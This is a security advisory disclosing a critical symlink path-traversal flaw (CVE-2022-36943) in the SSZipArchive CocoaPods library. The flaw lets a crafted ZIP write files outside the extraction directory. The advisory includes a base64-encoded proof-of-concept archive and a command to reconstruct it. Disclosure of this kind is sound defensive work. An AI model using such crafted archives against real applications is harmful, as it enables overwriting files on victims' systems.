Skip to content

SSZipArchive Arbitrary File Write Vulnerability

Critical
landaire published GHSA-vgvw-6xcf-qqfc Jan 3, 2023

Package

SSZipArchive (CocoaPods)

Affected versions

<=2.5.3

Patched versions

None

Description

Vulnerability Description:

SSZipArchive typically sanitizes file paths to ensure that no files are written outside of the provided destination directory argument. However, symlinks are also supported and have no sanitization checks performed on the symlink's target path.

An attacker can therefore embed a symlink in a ZIP archive pointing to a location of their choosing as the first file in the archive to first create the symlink. If a regular file in the ZIP has the same name as the symlink, the library will open and implicitly follow the symlink using an fopen() call, and the contents of the file are written to the symlink target.

An example file may look like the following, where the first entry is a symlink whose target is ../test:

$ unzip -v ./symlink_escape.zip
Archive:  ./symlink_escape.zip
 Length   Method    Size  Cmpr    Date    Time   CRC-32   Name
--------  ------  ------- ---- ---------- ----- --------  ----
       7  Stored        7   0% 06-30-2022 06:14 85e2e03c  test
       5  Defl:N        7 -40% 06-30-2022 06:14 3610a686  test
--------          -------  ---                            -------
      12               14 -17%                            2 files

Proof of Concept:

The following bash script will un-base64 and uncompress an .xz file containing a maliciously crafted ZIP archive.

echo -n "/Td6WFoAAATm1rRGAgAhARYAAAB0L+Wj4ADLAFxdACgSvGAol9VpzGR79fbdQZYxkTvx1S6doFjMMPFDEMyTmKrcgRgnOk+lDGZg51l0XJsdSne7oHE79HfM7ZzptavRzCqA5+gmfZMSfAeYDS+4bGvA2k6hII8S2qgAAMU3KxoPPYbUAAF4zAEAAADOOX2wscRn+wIAAAAABFla" | base64 -d | xz -d > symlink_escape.zip

The symlink_escape.zip file can then be used in any application that handles a ZIP archive using SSZipArchive, including its samples. A file named test containing hello will be written to the destination directory's parent after unzipping completes.

Recommendation:

Add path sanitization checks to the symlink's target to ensure it's a subdirectory of the destination path. Symlinks which are not relative to the destination path should be ignored unless the user explicitly requests it.

Severity

Critical

CVE ID

CVE-2022-36943

Credits